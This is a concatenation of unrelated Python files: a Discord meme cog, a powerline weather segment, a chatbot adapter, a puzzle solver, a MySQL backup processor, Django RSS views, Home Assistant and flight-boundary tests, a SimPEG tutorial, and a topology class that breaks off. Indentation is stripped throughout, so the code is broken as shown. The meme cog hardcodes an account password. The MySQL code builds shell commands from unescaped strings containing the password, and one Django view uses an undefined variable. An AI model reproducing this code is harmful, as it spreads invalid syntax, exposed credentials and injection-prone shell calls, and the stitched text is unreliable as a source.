url = "https://api.imgflip.com/get_memes"
r = requests.get(url)
result_json = json.loads(r.text)
templates = result_json["data"]["memes"]
templates_string_list = []
templates_string = "**Meme Templates**\n"
for template in templates:
length_test = templates_string + "* [`{}` - `{}`]\n".format(template["id"], template["name"])
if len(length_test) > 2000:
# We're past our character limit - add it to the list and reset the
# templates_string
templates_string_list.append(templates_string)
templates_string = ''
continue
# Not over the limit - add it to the string
templates_string += "* [`{}` - `{}`]\n".format(template["id"], template["name"])
# Add the templates_string to the list here if it contains anything
if len(templates_string):
templates_string_list.append(templates_string)
# Iterate over all the template strings and display them
for string in templates_string_list:
await ctx.message.author.send(string)
# await Message.say(self.bot, templates_string, ctx.message.author)
@commands.command(pass_context=True)
async def meme(self, ctx, template_id = None, text_zero = None, text_one = None):
"""Generate Meme"""
if not self.canDisplay(ctx.message.guild):
return
if text_one == None:
# Set as space if not included
text_one = " "
if template_id == None or text_zero == None or text_one == None:
msg = "Usage: `{}meme [template_id] [text#1] [text#2]`\n\n Meme Templates can be found using `$memetemps`".format(ctx.prefix)
await ctx.channel.send(msg)
return
templates = self.getTemps()
chosenTemp = None
msg = ''
idMatch = FuzzySearch.search(template_id, templates, 'id', 1)
if idMatch[0]['Ratio'] < 1:
# Not a perfect match - try name
nameMatch = FuzzySearch.search(template_id, templates, 'name', 1)
if nameMatch[0]['Ratio'] > idMatch[0]['Ratio']:
# Better match on name than id
chosenTemp = nameMatch[0]['Item']['id']
if not nameMatch[0]['Ratio'] == 1:
# Still not a perfect match...
msg = 'I\'ll assume you meant *{}*.'.format(nameMatch[0]['Item']['name'])
else:
# ID is a perfect match
chosenTemp = idMatch[0]['Item']['id']
url = "https://api.imgflip.com/caption_image"
payload = {'template_id': chosenTemp, 'username':'CorpBot', 'password': 'pooter123', 'text0': text_zero, 'text1': text_one }
r = requests.post(url, data=payload)
result_json = json.loads(r.text)
result = result_json["data"]["url"]
if msg:
# result = '{}\n{}'.format(msg, result)
await ctx.channel.send(msg)
# Download Image - set title as a space so it disappears on upload
await GetImage.get(result, self.bot, ctx.message.channel, " ")
def getTemps(self):
url = "https://api.imgflip.com/get_memes"
r = requests.get(url)
result_json = json.loads(r.text)
templates = result_json["data"]["memes"]
if templates:
return templates
return None
|
from __future__ import (unicode_literals, division, absolute_import, print_function)
import json
from powerline.lib.url import urllib_read, urllib_urlencode
from powerline.lib.threaded import KwThreadedSegment
from powerline.segments import with_docstring
weather_conditions_codes = (
('tornado', 'stormy'), # 0
('tropical_storm', 'stormy'), # 1
('hurricane', 'stormy'), # 2
('severe_thunderstorms', 'stormy'), # 3
('thunderstorms', 'stormy'), # 4
('mixed_rain_and_snow', 'rainy' ), # 5
('mixed_rain_and_sleet', 'rainy' ), # 6
('mixed_snow_and_sleet', 'snowy' ), # 7
('freezing_drizzle', 'rainy' ), # 8
('drizzle', 'rainy' ), # 9
('freezing_rain', 'rainy' ), # 10
('showers', 'rainy' ), # 11
('showers', 'rainy' ), # 12
('snow_flurries', 'snowy' ), # 13
('light_snow_showers', 'snowy' ), # 14
('blowing_snow', 'snowy' ), # 15
('snow', 'snowy' ), # 16
('hail', 'snowy' ), # 17
('sleet', 'snowy' ), # 18
('dust', 'foggy' ), # 19
('fog', 'foggy' ), # 20
('haze', 'foggy' ), # 21
('smoky', 'foggy' ), # 22
('blustery', 'windy' ), # 23
('windy', ), # 24
('cold', 'day' ), # 25
('clouds', 'cloudy'), # 26
('mostly_cloudy_night', 'cloudy'), # 27
('mostly_cloudy_day', 'cloudy'), # 28
('partly_cloudy_night', 'cloudy'), # 29
('partly_cloudy_day', 'cloudy'), # 30
('clear_night', 'night' ), # 31
('sun', 'sunny' ), # 32
('fair_night', 'night' ), # 33
('fair_day', 'day' ), # 34
('mixed_rain_and_hail', 'rainy' ), # 35
('hot', 'sunny' ), # 36
('isolated_thunderstorms', 'stormy'), # 37
('scattered_thunderstorms', 'stormy'), # 38
('scattered_thunderstorms', 'stormy'), # 39
('scattered_showers', 'rainy' ), # 40
('heavy_snow', 'snowy' ), # 41
('scattered_snow_showers', 'snowy' ), # 42
('heavy_snow', 'snowy' ), # 43
('partly_cloudy', 'cloudy'), # 44
('thundershowers', 'rainy' ), # 45
('snow_showers', 'snowy' ), # 46
('isolated_thundershowers', 'rainy' ), # 47
)
weather_conditions_icons = {
'day': 'DAY',
'blustery': 'WIND',
'rainy': 'RAIN',
'cloudy': 'CLOUDS',
'snowy': 'SNOW',
'stormy': 'STORM',
'foggy': 'FOG',
'sunny': 'SUN',
'night': 'NIGHT',
'windy': 'WINDY',
'not_available': 'NA',
'unknown': 'UKN',
}
temp_conversions = {
'C': lambda temp: temp,
'F': lambda temp: (temp * 9 / 5) + 32,
'K': lambda temp: temp + 273.15,
}
temp_units = {
'C': '°C',
'F': '°F',
'K': 'K',
}
class WeatherSegment(KwThreadedSegment):
interval = 600
default_location = None
location_urls = {}
@staticmethod
def key(location_query=None, **kwargs):
return location_query
def get_request_url(self, location_query):
try:
return self.location_urls[location_query]
except KeyError:
if location_query is None:
location_data = json.loads(urllib_read('http://freegeoip.net/json/'))
location = ','.join((
location_data['city'],
location_data['region_name'],
location_data['country_code']
))
self.info('Location returned by freegeoip is {0}', location)
else:
location = location_query
query_data = {
'q':
'use "https://raw.githubusercontent.com/yql/yql-tables/master/weather/weather.bylocation.xml" as we;'
'select * from we where location="{0}" and unit="c"'.format(location).encode('utf-8'),
'format': 'json',
}
self.location_urls[location_query] = url = (
'http://query.yahooapis.com/v1/public/yql?' + urllib_urlencode(query_data))
return url
def compute_state(self, location_query):
url = self.get_request_url(location_query)
raw_response = urllib_read(url)
if not raw_response:
self.error('Failed to get response')
return None
response = json.loads(raw_response)
try:
condition = response['query']['results']['weather']['rss']['channel']['item']['condition']
condition_code = int(condition['code'])
temp = float(condition['temp'])
except (KeyError, ValueError):
self.exception('Yahoo returned malformed or unexpected response: {0}', repr(raw_response))
return None
try:
icon_names = weather_conditions_codes[condition_code]
except IndexError:
if condition_code == 3200:
icon_names = ('not_available',)
self.warn('Weather is not available for location {0}', self.location)
else:
icon_names = ('unknown',)
self.error('Unknown condition code: {0}', condition_code)
return (temp, icon_names)
def render_one(self, weather, icons=None, unit='C', temp_format=None, temp_coldest=-30, temp_hottest=40, **kwargs):
if not weather:
return None
temp, icon_names = weather
for icon_name in icon_names:
if icons:
if icon_name in icons:
icon = icons[icon_name]
break
else:
icon = weather_conditions_icons[icon_names[-1]]
temp_format = temp_format or ('{temp:.0f}' + temp_units[unit])
converted_temp = temp_conversions[unit](temp)
if temp <= temp_coldest:
gradient_level = 0
elif temp >= temp_hottest:
gradient_level = 100
else:
gradient_level = (temp - temp_coldest) * 100.0 / (temp_hottest - temp_coldest)
groups = ['weather_condition_' + icon_name for icon_name in icon_names] + ['weather_conditions', 'weather']
return [
{
'contents': icon + ' ',
'highlight_group': groups,
'divider_highlight_group': 'background:divider',
},
{
'contents': temp_format.format(temp=converted_temp),
'highlight_group': ['weather_temp_gradient', 'weather_temp', 'weather'],
'divider_highlight_group': 'background:divider',
'gradient_level': gradient_level,
},
]
weather = with_docstring(WeatherSegment(),
'''Return weather from Yahoo! Weather.
Uses GeoIP lookup from http://freegeoip.net/ to automatically determine
your current location. This should be changed if you’re in a VPN or if your
IP address is registered at another location.
Returns a list of colorized icon and temperature segments depending on
weather conditions.
:param str unit:
temperature unit, can be one of ``F``, ``C`` or ``K``
:param str location_query:
location query for your current location, e.g. ``oslo, norway``
:param dict icons:
dict for overriding default icons, e.g. ``{'heavy_snow' : u'❆'}``
:param str temp_format:
format string, receives ``temp`` as an argument. Should also hold unit.
:param float temp_coldest:
coldest temperature. Any temperature below it will have gradient level equal
to zero.
:param float temp_hottest:
hottest temperature. Any temperature above it will have gradient level equal
to 100. Temperatures between ``temp_coldest`` and ``temp_hottest`` receive
gradient level that indicates relative position in this interval
(``100 * (cur-coldest) / (hottest-coldest)``).
Divider highlight group used: ``background:divider``.
Highlight groups used: ``weather_conditions`` or ``weather``, ``weather_temp_gradient`` (gradient) or ``weather``.
Also uses ``weather_conditions_{condition}`` for all weather conditions supported by Yahoo.
''')
|
from __future__ import unicode_literals
from .logic_adapter import LogicAdapter
class NoKnowledgeAdapter(LogicAdapter):
"""
This is a system adapter that is automatically added
to the list of logic adapters durring initialization.
This adapter is placed at the beginning of the list
to be given the highest priority.
"""
def process(self, statement):
"""
If there are no known responses in the database,
then a confidence of 1 should be returned with
the input statement.
Otherwise, a confidence of 0 should be returned.
"""
if self.chatbot.storage.count():
return 0, statement
return 1, statement
|
import sys
CS = [
"abcefg", "cf", "acdeg", "acdfg", "bcdf",
"abdfg", "abdefg", "acf", "abcdefg", "abcdfg",
]
LENS = set(len(x) for x in CS)
RCS = {l: [(i, x) for i, x in enumerate(CS) if len(x) == l] for l in LENS}
MCS = {k: i for i, k in enumerate(CS)}
def get(s):
l = list(s)
assert len(l) == 1, s
return l[0]
def solve(codes, nums):
print(RCS)
mapping = {}
rmap = {}
for code in codes:
opts = RCS[len(code)]
if len(opts) == 1:
mapping[code] = opts[0]
rmap[opts[0][0]] = code
print(rmap)
la = get(list(set(rmap[7]) - set(rmap[1])))
bd = (set(rmap[4]) - (set(rmap[1])|set(rmap[7])))
cf = (set(rmap[1])&set(rmap[7])&set(rmap[4]))
# 2, 3, 5
fives = [set(x) for x in codes if len(x) == 5]
three = get([x for x in fives if cf.issubset(x)])
print("THREE", three)
ld = get(bd & three)
lb = get(set(rmap[4]) - {la, ld, *cf})
lg = get(three - {la, ld, *cf})
sixes = [set(x) for x in codes if len(x) == 6]
nine = get([x for x in sixes if (cf|{ld}).issubset(x)])
print("NINE", nine)
le = get(set("abcdefg") - nine)
# just c, f
five = get([x for x in fives if le not in x and lb in x])
lf = get((five & cf))
lc = get(cf - {lf})
m = {"a": la, "b": lb, "c": lc, "d": ld, "e": le, "f": lf, "g": lg}
lm = {v: k for k, v in m.items()}
print(lm)
snum = ""
for num in nums:
numk = "".join(sorted(lm[c] for c in num))
snum += str(MCS[numk])
rnum = int(snum)
print(rnum)
return rnum
# print(la, lb, ld, le, lg, cf)
def main(args):
# data = [x.split('\n') for x in sys.stdin.read().split('\n\n')]
# data = [int(s.strip()) for s in sys.stdin]
data = [s.strip() for s in sys.stdin]
data = [x.split(" | ") for x in data]
data = [(x.split(" "), y.split(" ")) for x, y in data]
# solve(*data[0])
print(sum(solve(*ent) for ent in data))
# print(RCS)
if __name__ == '__main__':
main(sys.argv)
|
import os
import logging
from rdb_backup.utility import run_shell
from rdb_backup.processor import DatabaseProcessor, TableProcessor
log = logging.getLogger(__name__)
class MysqlLocal(DatabaseProcessor):
processor_name = 'mysql'
tmp_dir = '/tmp/rdb_backup/mysql_local'
if not os.path.exists(tmp_dir):
run_shell('mkdir -p %s' % tmp_dir)
run_shell('chmod og-rwx %s' % tmp_dir)
def __init__(self, dbms, name, db_config, tb_config):
super().__init__(dbms, name, db_config, tb_config)
self.dump_sql = os.path.join(self.tmp_dir, '__%s__complete__.sql' % self.name)
self.password = db_config.pop('password')
self.username = db_config.pop('username')
self.extended_insert = db_config.get('extended-insert', True)
def run_mysql(self, sql):
command = 'mysql -u %s -p\'%s\' -e "%s"' % (self.username, self.password, sql)
return run_shell(command, cwd=self.tmp_dir)
def table_names(self):
process = self.run_mysql('use %s; show tables;' % self.name)
out = process.stdout.readlines()
tables = []
for item in out:
tables.append(item.strip().decode('utf8'))
return tables[1:]
@staticmethod
def write_schema_sql(schema_sql, line):
if line.startswith('-- Dump completed on'):
schema_sql.write('-- Dump completed') # clear date time info
else:
schema_sql.write(line)
def backup(self, need_backup_tables):
dump_params = '-u %s -p\'%s\' --lock-all-tables --extended-insert=false' % (self.username, self.password)
run_shell('mysqldump %s %s > %s' % (dump_params, self.name, self.dump_sql), cwd=self.tmp_dir)
schema_sql = open(self.schema_sql, 'w')
sign = 0
table_sql = None
insert_str = None
insert_str_length = None
fields = []
for line in open(self.dump_sql):
if sign == 0:
if line.startswith('CREATE TABLE `'):
sign = 1
table_name = line[14:].split('`', 1)[0]
insert_str = 'INSERT INTO `%s` VALUES (' % table_name
insert_str_length = len(insert_str)
if table_name in need_backup_tables:
table_sql = need_backup_tables[table_name]
self.write_schema_sql(schema_sql, line)
elif sign == 1:
if line.startswith(' `'):
fields.append(line[3:].split('`', 1)[0])
else:
sign = 2
if table_sql:
table_sql.begin_backup(fields)
self.write_schema_sql(schema_sql, line)
elif sign == 2:
if line.startswith('DROP TABLE IF EXISTS '):
sign = 0
if table_sql:
table_sql.close()
table_sql = None
insert_str = None
insert_str_length = None
fields = []
self.write_schema_sql(schema_sql, line)
elif line.startswith(insert_str):
if table_sql:
table_sql.write_record(line[insert_str_length:-3])
else:
self.write_schema_sql(schema_sql, line)
log.info('backup ' + self.schema_sql)
if not self.debug:
os.unlink(self.dump_sql)
def restore(self):
tables_ignored = []
import_sql = open(self.backup_path.replace('{table_name}', 'import'), 'w')
sign = 0
table_name = None
for line in open(self.schema_sql):
if sign == 0:
if line.startswith('LOCK TABLES `'):
sign += 1
table_name = line[13:-9]
import_sql.write(line)
continue
if sign == 1:
import_sql.write(line)
if self.ignored(table_name):
tables_ignored.append(table_name)
else:
table_file_path = self.backup_path.replace('{table_name}', table_name)
if os.path.exists(table_file_path) and os.stat(table_file_path).st_size > 0:
if self.extended_insert:
split = ' '
import_sql.write('INSERT INTO `%s` VALUES' % table_name)
memory_size = 0
for data_line in open(table_file_path):
if memory_size > 1048576: # 1024 * 1024
import_sql.write(';' + os.linesep);
import_sql.write('INSERT INTO `%s` VALUES' % table_name)
memory_size = 0
split = ' '
memory_size += len(data_line)
import_sql.write(split + '(' + data_line[:-1] + ')')
if split == ' ':
split = ','
import_sql.write(';' + os.linesep);
else:
insert_sql = 'INSERT INTO `%s` VALUES (%%s);%s' % (table_name, '\n')
for data_line in open(table_file_path):
import_sql.write(insert_sql % data_line[:-1])
sign = 0
table_name = None
continue
if tables_ignored:
log.info('ignored tables: %s' % tables_ignored)
log.info('generate import file: %s', import_sql.name)
import_sql.close()
class MysqlTable(TableProcessor):
processor_name = 'mysql'
def begin_backup(self, fields):
self.set_field_names(fields)
self.file = open(self.backup_path, 'w')
@classmethod
def get_record(cls, data):
field = None
in_mark = False
in_wildcard = False
fields = []
for _char in data:
if field is None:
if _char == '\'':
in_mark = True
field = ''
else:
in_mark = False
field = _char
else:
if in_mark:
if in_wildcard:
in_wildcard = False
else:
if _char == '\\':
in_wildcard = True
elif _char == '\'':
in_mark = False
else:
field += _char
else:
if _char == ',':
fields.append(field)
field = None
in_mark = False
else:
field += _char
fields.append(field)
return fields
def write_record(self, line):
if self.filter is None:
self.file.write(line + os.linesep)
else:
need_write = False
field_name, operator, filter_value = self.filter
record = self.get_record(line[:-len(os.linesep)])
field_value = self.get_field(record, field_name)
if operator == '>':
if field_value > filter_value:
need_write = True
if operator == '=':
if filter_value == 'None':
if field_value == 'NULL':
need_write = True
elif field_value == filter_value:
need_write = True
if operator == '!=':
if filter_value == 'None':
if field_value != 'NULL':
need_write = True
elif field_value != filter_value:
need_write = True
if operator == '<':
if field_value < filter_value or field_value == 'NULL': # or field_value is None
need_write = True
if need_write:
self.file.write(line + os.linesep)
|
from django.http import HttpResponse
from django.template import RequestContext, loader
from rss_feed.models import Feed
import feedparser
def index(request):
"""
index lists the feeds we are tracking
"""
feed_list = Feed.objects.all()
template = loader.get_template('index.html')
context = RequestContext(request, {
'feed_list': feed_list,
})
return HttpResponse(template.render(context))
def feed_results(request, feed):
"""
feed_results returns the results of given feed
"""
results = feedparser.parse(feed_url)
template = loader.get_template('feed_results.html')
context = RequestContext(request, {
'title' : results['feed']['title'],
'url' : results['feed']['link'],
'entries': results['entries']
})
return HttpResponse(template.render(context))
|
"""Test Automation config panel."""
from http import HTTPStatus
import json
from unittest.mock import patch
import pytest
from homeassistant.bootstrap import async_setup_component
from homeassistant.components import config
from homeassistant.helpers import entity_registry as er
from tests.components.blueprint.conftest import stub_blueprint_populate # noqa: F401
@pytest.fixture
async def setup_automation(
hass, automation_config, stub_blueprint_populate # noqa: F811
):
"""Set up automation integration."""
assert await async_setup_component(
hass, "automation", {"automation": automation_config}
)
@pytest.mark.parametrize("automation_config", ({},))
async def test_get_device_config(hass, hass_client, setup_automation):
"""Test getting device config."""
with patch.object(config, "SECTIONS", ["automation"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
def mock_read(path):
"""Mock reading data."""
return [{"id": "sun"}, {"id": "moon"}]
with patch("homeassistant.components.config._read", mock_read):
resp = await client.get("/api/config/automation/config/moon")
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"id": "moon"}
@pytest.mark.parametrize("automation_config", ({},))
async def test_update_device_config(hass, hass_client, setup_automation):
"""Test updating device config."""
with patch.object(config, "SECTIONS", ["automation"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
orig_data = [{"id": "sun"}, {"id": "moon"}]
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
), patch("homeassistant.config.async_hass_config_yaml", return_value={}):
resp = await client.post(
"/api/config/automation/config/moon",
data=json.dumps({"trigger": [], "action": [], "condition": []}),
)
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"result": "ok"}
assert list(orig_data[1]) == ["id", "trigger", "condition", "action"]
assert orig_data[1] == {"id": "moon", "trigger": [], "condition": [], "action": []}
assert written[0] == orig_data
@pytest.mark.parametrize("automation_config", ({},))
async def test_update_remove_key_device_config(hass, hass_client, setup_automation):
"""Test updating device config while removing a key."""
with patch.object(config, "SECTIONS", ["automation"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
orig_data = [{"id": "sun", "key": "value"}, {"id": "moon", "key": "value"}]
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
), patch("homeassistant.config.async_hass_config_yaml", return_value={}):
resp = await client.post(
"/api/config/automation/config/moon",
data=json.dumps({"trigger": [], "action": [], "condition": []}),
)
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"result": "ok"}
assert list(orig_data[1]) == ["id", "trigger", "condition", "action"]
assert orig_data[1] == {"id": "moon", "trigger": [], "condition": [], "action": []}
assert written[0] == orig_data
@pytest.mark.parametrize("automation_config", ({},))
async def test_bad_formatted_automations(hass, hass_client, setup_automation):
"""Test that we handle automations without ID."""
with patch.object(config, "SECTIONS", ["automation"]):
await async_setup_component(hass, "config", {})
client = await hass_client()
orig_data = [
{
# No ID
"action": {"event": "hello"}
},
{"id": "moon"},
]
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
), patch("homeassistant.config.async_hass_config_yaml", return_value={}):
resp = await client.post(
"/api/config/automation/config/moon",
data=json.dumps({"trigger": [], "action": [], "condition": []}),
)
await hass.async_block_till_done()
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"result": "ok"}
# Verify ID added to orig_data
assert "id" in orig_data[0]
assert orig_data[1] == {"id": "moon", "trigger": [], "condition": [], "action": []}
@pytest.mark.parametrize(
"automation_config",
(
[
{
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"action": {"service": "test.automation"},
},
{
"id": "moon",
"trigger": {"platform": "event", "event_type": "test_event"},
"action": {"service": "test.automation"},
},
],
),
)
async def test_delete_automation(hass, hass_client, setup_automation):
"""Test deleting an automation."""
ent_reg = er.async_get(hass)
assert len(ent_reg.entities) == 2
with patch.object(config, "SECTIONS", ["automation"]):
assert await async_setup_component(hass, "config", {})
client = await hass_client()
orig_data = [{"id": "sun"}, {"id": "moon"}]
def mock_read(path):
"""Mock reading data."""
return orig_data
written = []
def mock_write(path, data):
"""Mock writing data."""
written.append(data)
with patch("homeassistant.components.config._read", mock_read), patch(
"homeassistant.components.config._write", mock_write
), patch("homeassistant.config.async_hass_config_yaml", return_value={}):
resp = await client.delete("/api/config/automation/config/sun")
await hass.async_block_till_done()
assert resp.status == HTTPStatus.OK
result = await resp.json()
assert result == {"result": "ok"}
assert len(written) == 1
assert written[0][0]["id"] == "moon"
assert len(ent_reg.entities) == 1
|
from SDA import *
import unittest
import numpy
class FlightBoundaryTestCase(unittest.TestCase):
def setUp(self):
test_min_altitude1 = 50.0
test_max_altitude1 = 200.0
test_min_altitude2 = -300.0
test_max_altitude2 = -50.0
test_boundary_waypoints1 = numpy.array([(0,0),(0,100),(100,100),(100,0)])
test_boundary_waypoints2 = numpy.array([(-25,0),(50,50),(0,100),(-100,150),(100,150),(150,0),(50,-50),(0,-100),(100,-150),(-100,-150)])
self.test_flight_boundary1 = FlightBoundary(test_min_altitude1, test_max_altitude1, test_boundary_waypoints1)
self.test_flight_boundary2 = FlightBoundary(test_min_altitude2, test_max_altitude2, test_boundary_waypoints2)
def test_is_point_in_bounds(self):
test_point1 = numpy.array([50, 50, 100])
test_point2 = numpy.array([1, 1, 51])
test_point3 = numpy.array([99, 99, 199])
test_point4 = numpy.array([1, 1, 50])
test_point5 = numpy.array([99, 99, 200])
test_point6 = numpy.array([50, 50, 49])
test_point7 = numpy.array([50, 50, 201])
self.assertTrue(self.test_flight_boundary1.is_point_in_bounds(test_point1))
self.assertTrue(self.test_flight_boundary1.is_point_in_bounds(test_point2))
self.assertTrue(self.test_flight_boundary1.is_point_in_bounds(test_point3))
self.assertFalse(self.test_flight_boundary1.is_point_in_bounds(test_point4))
self.assertFalse(self.test_flight_boundary1.is_point_in_bounds(test_point5))
self.assertFalse(self.test_flight_boundary1.is_point_in_bounds(test_point6))
self.assertFalse(self.test_flight_boundary1.is_point_in_bounds(test_point7))
test_point8 = numpy.array([100, 100, -150])
test_point9 = numpy.array([50, 51, -299])
test_point10 = numpy.array([0, 101, -51])
test_point11 = numpy.array([-49, 0, -300])
test_point12 = numpy.array([-50, -100, -50])
test_point13 = numpy.array([100, 149, -301])
test_point14 = numpy.array([-99, 149, -49])
self.assertTrue(self.test_flight_boundary2.is_point_in_bounds(test_point8))
self.assertTrue(self.test_flight_boundary2.is_point_in_bounds(test_point9))
self.assertTrue(self.test_flight_boundary2.is_point_in_bounds(test_point10))
self.assertFalse(self.test_flight_boundary2.is_point_in_bounds(test_point11))
self.assertFalse(self.test_flight_boundary2.is_point_in_bounds(test_point12))
self.assertFalse(self.test_flight_boundary2.is_point_in_bounds(test_point13))
self.assertFalse(self.test_flight_boundary2.is_point_in_bounds(test_point14))
def test_path_method(self):
test_point1 = numpy.array([50, 50])
test_point2 = numpy.array([1, 1])
test_point3 = numpy.array([99, 99])
test_point4 = numpy.array([0, 0])
test_point5 = numpy.array([100, 100])
test_point6 = numpy.array([101, 99])
test_point7 = numpy.array([1, -1])
self.assertTrue(self.test_flight_boundary1.path_method(test_point1))
self.assertTrue(self.test_flight_boundary1.path_method(test_point2))
self.assertTrue(self.test_flight_boundary1.path_method(test_point3))
self.assertFalse(self.test_flight_boundary1.path_method(test_point4))
self.assertFalse(self.test_flight_boundary1.path_method(test_point5))
self.assertFalse(self.test_flight_boundary1.path_method(test_point6))
self.assertFalse(self.test_flight_boundary1.path_method(test_point7))
test_point8 = numpy.array([49, 49])
test_point9 = numpy.array([0, 101])
test_point10 = numpy.array([99, -149.8])
test_point11 = numpy.array([-99, 149])
test_point12 = numpy.array([40, 50])
test_point13 = numpy.array([0, -150])
test_point14 = numpy.array([40, -100])
self.assertTrue(self.test_flight_boundary2.path_method(test_point8))
self.assertTrue(self.test_flight_boundary2.path_method(test_point9))
self.assertTrue(self.test_flight_boundary2.path_method(test_point10))
self.assertFalse(self.test_flight_boundary2.path_method(test_point11))
self.assertFalse(self.test_flight_boundary2.path_method(test_point12))
self.assertFalse(self.test_flight_boundary2.path_method(test_point13))
self.assertFalse(self.test_flight_boundary2.path_method(test_point14))
|
"""
Response from a Homogeneous Layer for Different Waveforms
=========================================================
Here we use the module *SimPEG.electromagnetics.viscous_remanent_magnetization*
to predict the characteristic VRM response over magnetically viscous layer.
We consider a small-loop, ground-based survey which uses a coincident loop
geometry. For this tutorial, we focus on the following:
- How to define the transmitters and receivers
- How to define the survey
- How to define a diagnostic physical property
- How to define the physics for the linear potential fields formulation
- How the VRM response depends on the transmitter waveform
Note that for this tutorial, we are only modeling the VRM response. A separate
tutorial have been developed for modeling both the inductive and VRM responses.
"""
import SimPEG.electromagnetics.viscous_remanent_magnetization as vrm
from discretize import TensorMesh
from discretize.utils import mkvc
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
waveform_list = []
waveform_list.append(vrm.waveforms.StepOff(t0=0))
waveform_list.append(vrm.waveforms.SquarePulse(t0=0, delt=0.02))
t_wave = np.r_[-0.03, -0.02, -0.01, 0]
I_wave = np.r_[0.0, 1.0, 1.0, 0]
waveform_list.append(vrm.waveforms.ArbitraryPiecewise(t_wave=t_wave, I_wave=I_wave))
t_wave = np.r_[-0.04, -0.02, 0]
I_wave = np.r_[0.0, 1.0, 0]
waveform_list.append(vrm.waveforms.ArbitraryPiecewise(t_wave=t_wave, I_wave=I_wave))
fig = plt.figure(figsize=(8, 4))
mpl.rcParams.update({"font.size": 12})
ax1 = fig.add_axes([0.1, 0.1, 0.85, 0.85])
ax1.plot(np.r_[-0.04, 0.0, 0.0, 0.02], np.r_[1, 1, 0, 0], "b", lw=2)
ax1.plot(np.r_[-0.04, -0.02, -0.02, 0.0, 0.0, 0.04], np.r_[0, 0, 1, 1, 0, 0], "r", lw=2)
ax1.plot(np.r_[-0.04, -0.03, -0.02, -0.01, 0, 0.04], np.r_[0, 0, 1, 1, 0, 0], "k", lw=2)
ax1.plot(np.r_[-0.04, -0.02, 0, 0.04], np.r_[0, 1, 0, 0], "g", lw=2)
ax1.set_xlim((-0.04, 0.04))
ax1.set_ylim((-0.01, 1.1))
ax1.set_xlabel("time [s]")
ax1.set_ylabel("current [A]")
ax1.set_title("Waveforms")
ax1.legend(
["step-off", "20 ms square pulse", "30 ms trapezoidal", "40 ms triangular"],
loc="upper right",
)
time_channels = np.logspace(-4, -1, 31)
xyz = np.c_[0.0, 0.0, 0.5]
dbdt_receivers = [
vrm.receivers.Point(xyz, times=time_channels, fieldType="dbdt", orientation="z")
]
source_list = []
dipole_moment = [0.0, 0.0, 1]
for pp in range(0, len(waveform_list)):
# Define the transmitter-receiver pair for each waveform
source_list.append(
vrm.sources.MagDipole(
dbdt_receivers, mkvc(xyz), dipole_moment, waveform_list[pp]
)
)
survey = vrm.Survey(source_list)
cs, ncx, ncy, ncz, npad = 2.0, 35, 35, 5, 5
hx = [(cs, npad, -1.3), (cs, ncx), (cs, npad, 1.3)]
hy = [(cs, npad, -1.3), (cs, ncy), (cs, npad, 1.3)]
hz = [(cs, ncz)]
mesh = TensorMesh([hx, hy, hz], "CCN")
model_value = 0.0001
model = model_value * np.ones(mesh.nC)
ind_active = np.ones(mesh.nC, dtype="bool")
simulation = vrm.Simulation3DLinear(
mesh,
survey=survey,
indActive=ind_active,
refinement_factor=2,
refinement_distance=[2.0, 4.0],
)
dpred = simulation.dpred(model)
n_times = len(time_channels)
n_waveforms = len(waveform_list)
dpred = np.reshape(dpred, (n_waveforms, n_times)).T
fig = plt.figure(figsize=(6, 7))
ax1 = fig.add_axes([0.15, 0.1, 0.8, 0.85])
ax1.loglog(time_channels, -dpred[:, 0], "b", lw=2)
ax1.loglog(time_channels, -dpred[:, 1], "r", lw=2)
ax1.loglog(time_channels, -dpred[:, 2], "k", lw=2)
ax1.loglog(time_channels, -dpred[:, 3], "g", lw=2)
ax1.set_xlim((np.min(time_channels), np.max(time_channels)))
ax1.set_xlabel("time [s]")
ax1.set_ylabel("-dBz/dt [T/s]")
ax1.set_title("Characteristic Decay")
ax1.legend(
["step-off", "20 ms square pulse", "30 ms trapezoidal", "40 ms triangular"],
loc="upper right",
)
|
"""
This module implements an internal topology builder class QTopology.
QTopology creates a mapping between the system's structure (QStruct),
bonding patterns/charges (QLib), and the parameters (Qrm), allowing
evaluation of individual topological components of the system.
"""
from __future__ import absolute_import, unicode_literals, division
from Qpyl.core import qlibrary
from Qpyl.core import qparameter
from Qpyl.core import qstructure
from Qpyl.core import qpotential
from six.moves import range
class QTopologyError(Exception):
pass
class QTopology(object):
"""
Class for storing topology information.
(mashup of library, parameter and structure data)
Contains lists of atoms, bonds, angles, torsions
and impropers, along with their parameters.
The constructor takes in three arguments:
qlib (qlibrary.QLib object)
qprm (qparameter.QPrm object)
qstruct (qstructure.QStruct object)
Typical usage:
qlib = qlibrary.QLib("amber")
qprm = qparameter.QPrm("amber")
qstruct = qstructure.QStruct()
qlib.read_lib(".../qamber14.lib")
qprm.read_prm(".../qamber14.prm")
qstruct.read_pdb(".../14u3.pdb")
try:
qtopo = QTopology(qlib, qprm, qstruct)
except QTopologyError as e:
print "Failed to make topology: " + str(e)
for bond in qtopo.bonds:
print "%s: fk %.2f, r0 %.2f, r %.2f, E(r) %.2f" %
(bond, bond.prm.fc, bond.prm.r0, bond.r, bond.energy)
"""
def __init__(self, qlib, qprm, qstruct):
# do some type checking to prevent bad things from happening
for arg, _type in ((qlib, qlibrary.QLib),
(qprm, qparameter.QPrm),
(qstruct, qstructure.QStruct)):
if not isinstance(arg, _type):
raise QTopologyError("{} not of type {}".format(arg, _type))
if qlib.ff_type != qprm.ff_type:
raise QTopologyError("QLib FF ({}) not "
"compatible with QPrm FF ({})"
.format(qlib.ff_type, qprm.ff_type))
self.qlib = qlib
self.qprm = qprm
